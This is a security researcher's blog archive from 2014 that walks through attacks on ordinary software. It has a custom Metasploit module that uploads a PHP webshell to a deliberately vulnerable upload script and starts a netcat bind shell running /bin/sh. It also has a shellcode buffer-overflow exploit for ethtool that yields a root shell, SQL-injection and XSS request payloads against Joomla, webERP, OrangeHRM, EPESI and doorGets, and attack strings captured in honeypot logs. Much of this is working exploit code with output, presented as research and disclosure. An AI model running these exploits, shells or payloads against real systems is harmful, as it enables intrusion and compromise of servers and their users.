Tuesday, 30 December 2014

[EN] Your own modules for Metasploit

Sometimes during penetration tests we are using tools like Metasploit.
Last time I had a moment to check this more carefully.

I was wondering how can I automate exploitation process of vulnerabilities found in the past. One idea was to use MSF.

After docs:
to start using 'your own modules' (or external), you need to prepare your system a little bit.
I was using kali-1.0.7 with vmplayer. There I was using apache2 + PHP.

First of all we will create a vulnerable webapplication. This simple bug will be related to "upload vulnerability" (so our MSF module should upload webshell to target host).

Let's create 2 directories:
mkdir /var/www/upload
mkdir /var/www/upload/foto


Next, we need to change permissions of our 'foto' directory, to 777.
Next step will be creating an upload.php file in '/upload/' direcory.
(Code is borrowed from one tutorial found somewhere on the internet).

---<upload.php>---
root@kali:/var/www/upload# cat upload.php
<?php
$max_rozmiar = 1024*1024;
if (is_uploaded_file($_FILES['plik']['tmp_name'])) {
    if ($_FILES['plik']['size'] > $max_rozmiar) {
        echo 'Blad! Plik jest za duzy!';
    } else {
        echo 'Odebrano plik. Poczatkoowa nazwa: '.$_FILES['plik']['name'];
        echo '<br/>';
        if (isset($_FILES['plik']['type'])) {
            echo 'Typ: '.$_FILES['plik']['type'].'<br/>';
        }
        move_uploaded_file($_FILES['plik']['tmp_name'],
                $_SERVER['DOCUMENT_ROOT'].'/upload/foto/'.$_FILES['plik']['name']);
    }
} else {
   echo 'Blad przy przesylaniu danych!';
}

?>
root@kali:/var/www/upload#
---<upload.php>---
When we have all (vulnerable) files (and dirs) prepared, we can start configuring our 'msf environment'. Let's back to the docs:

---<doc>---*  Mirror the "real" Metasploit module paths
mkdir -p $HOME/.msf4/modules/exploit

*  Create an appropriate category # for our example we don't need it now ;)
mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat

*  Create the module
...# we will get to it ;)

*  Test it all out
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb http://yours/test_module.rb

* reload msf
msf > reload_all

* use your code
msf > use exploit/test/test_module
msf exploit(test_module) > info 
---<doc>---

Now, when our local OS is prepared and ready to use, we can move on to creating our simple module:

---<upload_check.rb>---

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Super cool shell upload',
      'Description'    => %q{
                This is super cool module for Metasploit to check if you can upload shell on target.
      },
      'Author'         =>
        [
          'HauntIT Blog'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://HauntIT.blogspot.com']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Any vulnerable upload ', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '28/12/2014'))
  end


  def check
    readurl = normalize_uri(target_uri.path, 'upload','upload.php')
    res = send_request_cgi({
      'uri'    => readurl,
      'method' => 'GET'
    })

    if res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end

    return Msf::Exploit::CheckCode::Safe
  end

  def exploit
    payload_name = "#{rand_text_alpha(10)}.php"

    shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"

    uri = normalize_uri(target_uri.path, 'upload','upload.php')

    data = Rex::MIME::Message.new
    data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")


    post_data = data.to_s

    payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)

    print_status("#{peer} - Uploading payload to #{payload_uri}")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => uri,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'vars_post' => { 'plik' => '#{payload_name}' },
      'data'     => post_data
    })

    if res.code != 200 || res.body =~ /Blad/
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    else
      print_status("Got shell ;>")
    end

    print_status("#{peer} - Executing payload #{payload_uri}")
    res = send_request_cgi({
      'uri'    => payload_uri,
      'method' => 'GET',
      'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
    })


  end
end

---<upload_check.rb>---
(Pastebin version is here.)

Now it's time to step "Test it all out", so let's upload our new module to ~/.msf4 directory and type reload_all in msfconsole. To get to our module, we need to type:

---<console>---
msf>  use exploit/test/upload_check

---<console>---

Exploitation should be:

---<sploit>---
msf exploit(upload_check) > exploit
[*] Started reverse handler on 192.168.108.133:4444
[*] 192.168.108.133:80 - Uploading payload to /upload/foto/UXpCFrWwkW.php
[*] Got shell ;>
[*] 192.168.108.133:80 - Executing payload /upload/foto/UXpCFrWwkW.php
---<sploit>---
 

 Now in second console, we will connect to attacked host:

---<console>---
root@kali:/var/www/upload# netstat -antp | grep 444
tcp        0      0 0.0.0.0:4445            0.0.0.0:*               LISTEN      21563/nc
root@kali:/var/www/upload#
root@kali:/var/www/upload# telnet 192.168.108.133 4445
Trying 192.168.108.133...
Connected to 192.168.108.133.
Escape character is '^]'.
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(...)
---<console>---


And that's all. ;)

Questions / ideas / comments?

Good luck with creating your own modules!


Tuesday, 23 December 2014

[EN] Vulnerabilities in popular plugins - Joomla case

Hi,

during last few months I was involved in multiple pentests (webapps, infrastructures) in multiple countries. That's why I didn't post here anything new (almost since last May ;) ).

For all of you who want to talk with me (faster than via email), you can reach me also at twitter.

For all of you, who are watching my blog - I have something new for you. A little mini-art-series where I describing multiple (mostly SQL Injection) vulnerabilitiesin multiple popular plugins (this time for Joomla).

If you want more (for example also for other popular content management systems) feel free to write to me.

Comments, ideas are welcome as always.

Article is now available here.
And also at PacketStormSecurity too.

Enjoy ;)

Saturday, 3 May 2014

How I meet your Joomla 3.2.2 SQL Injection

In March this year I found that Joomla 3.2.2 with default data
installed is vulnerable to SQL Injection attack.
 

After few lines from log from April,
you should know how it was done.

root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; 

rv:29.0) Gecko/20100101 Firefox/29.0"


Joomla 3.2.2 error


Why I decide to publish it. And here you will find even more.


Enjoy
o/

Sunday, 27 April 2014

[EN] Bots in the log

Few weeks ago I decide to create another mini-honeypot.
To do this, I used Apache server with ModSecurity installed.

After few modifications of existing rules, next thing was to
create some 'log reader' to quick check if there is something
new (and interesting) in logs, or not. And of course, to
learn more about how bots are talking with my machine,
where they want to connect, and what 'exploits' they are
using.

During last few weeks I was observing multiple GET and POST
requests to Apache (where I have only index.html and robots.txt
file, but it wasn't a hint for attackers, because they scanned
all possible vulnerabilities anyway ;)).

For example, few very often requests was related to vulnerable phpMyAdmin installation and other old webapps:
---<code>---
# grep GET modsec_audit.log
GET /phpTest/zologize/axa.php HTTP/1.1
GET /phpMyAdmin/scripts/setup.php HTTP/1.1
GET /pma/scripts/setup.php HTTP/1.1
GET /myadmin/scripts/setup.php HTTP/1.1
GET / HTTP/1.1
GET /robots.txt HTTP/1.1
---<code>---

This is not the problem to find out what vulnerabilities was
tried to reach, let's google it:
 

---<code>---
POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1
---<code>---

As you can see, here is a very useful post 

(by SpiderLabs) about this vulnerability.

Of course you can now get 'tools' from this kind of POST (http://attackers-host/histool)
and read it. Often you will find bash script, trying to download pscan or some exploit to get-root on your machine. 

Kind of fun ;)

But probably nothing new...

Anyway, in a last few days I found interesting line in logs:
---<code>---
162.213.24.40 - - [25/Apr/2014:22:38:05 +0200] "GET /toplel.action?class[%27classLoader%27][%27resources%27][%27dirContext%27][%27docBase%27]=//162.213.24.40/toplel HTTP/1.0" 403 466 "-" "-"
---<code>---

I was a little surprised, because this was the first time I saw it in my logs. So I tried to find some information at google, and that's how I found a very nice post at SpamBotSecurity Forum
that this is a bug in Apache Struts but also please check this.

(Also 'toplel' seems to be a malware)

Probably in the future I will post here something new about it,
but now if you want, you can check my simple log reader to verify

if in your logs you will find something interesting.

Of course you can use another simple script to block
this kind of requests. Check this out:
---<code>---
# cat ban_modsec.sh
#!/bin/sh

# script to simple block all IP's from mod_security.log
MODSLOG="/var/log/apache2/modsec_audit.log"

#uniq IP addresses to block
echo ""
echo "In the last mod_security log, found : [`grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq | wc -l`]"
echo ""
grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq > 2ban.log

for line in `cat 2ban.log`; do
        iptables -A INPUT -s $line -j DROP
        echo "[+] $line - banned"
done
date >> 2ban.log
echo "-------------------------------------------" >> 2ban.log
echo "[+] Done."

---<code>---

If you have any ideas how can we build more secure servers
feel free to write a comment here.

Enjoy ;)

Tuesday, 15 April 2014

[EN] Just allow popup

k@lab:~/public_html/js$ cat xxx.html
<!-- seems to be simple ;]                       --!>
<!-- of course will work only with popup enabled --!>

<script>
function NewTab(url){
        var hi=window.open(url, '_blank');
        hi.focus();
}
NewTab(window.location);
</script>
k@lab:~/public_html/js$


;]

Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During last days I was checking some old apps for Slackware 9.1.

My goal was to find some useful bugs to write few exploits (just for practice of course).
During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.

Below is a short note from testing (overflow in '-k' param):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface.  See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Version 3 - January 27, 2005

        * Feature: r8159 register dump support
        * Feature / bug fix: Support advertising gigabit ethernet
        * Bug fix: make sure to advertise 10baseT-HD
        * Other minor bug fixes.

Version 2 - August 17, 2004
 

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
                                         Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$

---<code>---

Few more options of ethtool are also vulnerable (seems to be the same buffer value):
---<code>---

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

---<code>---

And if we'll set chown for root and +s for ethtool, we will get:
---<code>---

tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr  9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool

        -=[ ethtool - local buffer overflow exploit ]=-

Offload parameters for 1ŔPh//shh/binăPSá°
                                         Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#

---<code>--- 

That's all :)
Happy hunting!

o/ 

Monday, 31 March 2014

[EN] Simple quick Apache log reading

As far as I can see at logs of my Apache, last few weeks was very busy for few guys trying to hack my honeypot ;) 

Good job guys!

For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.

You can obviously add it to cron or just run as a normal Bash script. 

Here you have a code:

---<code>---
#!/bin/sh

ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"

echo
echo "**** Test Apache logs... ****"
echo

cut -d' ' -f1 $ACCESS > $FOUND

cat $FOUND | uniq > $UNIQ
echo "[+] Found host(s) : " `wc -l $UNIQ`

for host in `cat $UNIQ`; do
  echo "--------------------------------------------------------------"
  echo "[+] Testing : " $host
  host $host
  whois $host | grep -e "country\|address"
  echo ""
  echo "[+] looking for: "
  grep $host $ACCESS | cut -d' ' -f 6-8
  echo "--------------------------------------------------------------"
done

---<code>---

Wednesday, 26 March 2014

[EN] X2 Community - update for you

Few days ago I found that X2 is vulnerable to few web attacks.

After great work of X2 Team, below you will find a link to informations about
new update.

Check here ;)

Great job X2 Team!

Monday, 3 March 2014

[EN] New release of MantisBT 1.2.17

After last patching of MantisBT, there is a fresh and new version!

Check the details about new release and remember to install the patch ;)
More details about this finding you can get here or here

Once again big thanks for the excellent cooperation goes to the Dev Team of Mantis!
Great job!

[EN] Joomla 3.2.2 pre-auth persistent XSS

Maybe you want to verify... ;)

# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62

(...)
Content-Length: 288

jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---



Joomla XSS - request


And:

---<response>---
(...)
 title="<strong>Email</strong><br />Email for contact">Email<span class="star">&#160;*</span></label></div>
                <div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
            </div>
(...)
---<response>---


From Burp it looks like this:
 

XSS - view from Burp

Response at the page:




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Friday, 28 February 2014

[EN] Mantis 1.2.16 SQL Injection - updated

As I wrote moment ago, there is an SQL injection vulnerability in latest MantisBT.

Currently, because of a fast and great work of Developer Team, it is fixed.

You can check the details here and in public section of this blog.

Once again, big thanks to Developers Team!
Great job! :)

[EN] SQL Injection in webERP

# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391

FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] SQL Injection in MantisBT 1.2.16

This post will be updated as soon as Vendor will release the patch ;)

[EN] Multiple vulnerabilities in doorGets 6.0

# ==============================================================
# Title ...|
Multiple vulnerabilities in doorGets 6.0
# Version .| doorGets 6.0
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================


# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/door/dg-admin/?controller=modulevideo&uri='`"%3b--#%%2f%2a HTTP/1.1
Host: 10.149.14.62(...)
Connection: close
---<request>---


---<response>---
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90

Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>20 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 97
>50 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 98
>100

Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
---<response>---

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=modulepage&uri=asdasd&lg=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 294

modulepage_edit_titre=asdasd&modulepage_edit_article_tinymce=</textarea><body onload=alert(123)>&modulepage_edit_meta_titre=asdasd&modulepage_edit_meta_description=asdasd&modulepage_edit_meta_keys=&modulepage_edit_partage=1&modulepage_edit_submit=Save
---<request>---

# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=configuration&action=siteweb HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 475

configuration_siteweb_statut=1&configuration_siteweb_statut_ip='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&configuration_siteweb_statut_tinymce=&configuration_siteweb_title=startowa&configuration_siteweb_slogan=startowa&configuration_siteweb_description=startowa&configuration_siteweb_copyright=startowa&configuration_siteweb_year=2014&configuration_siteweb_keywords=startowa&configuration_siteweb_id_facebook=&configuration_siteweb_id_disqus=&configuration_siteweb_submit=Save
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in OrangeHRM

# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================

[+] from admin user:

# ==============================================================
# XSS

---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418

empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Thursday, 27 February 2014

[EN] EPESI CRM vulnerable to persistent XSS

# ==============================================================
# Title ...| EPESI CRM vulnerable to persistent XSS
# Version .| epesi-1.5.5-20140113.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://epe.si/download
# ==============================================================


# ==============================================================
# Persistent XSS

---<request>---
POST /k/cms/epesi/epesi-1.5.5-20140113/process.php HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

history&url=_qf__libs_qf_de799fa0f329f8e35b5f4c3a4a059f5e%3D%26submited%3D1%26tab_name%3Da'%3e"%3e%3cbody%2fonload%3dalert(9999)%3eaaaa%26id%3D%26__action_module__%3D%252FBase_Box%257C0%252FBase_HomePage%257Cmain_0%252FBase_Dashboard%257C0
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] GroupOffice Multiple XSS

# ==============================================================
# Title ...| GroupOffice Multiple XSS
# Version .| groupoffice-com-5.0.44.tar.gz
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
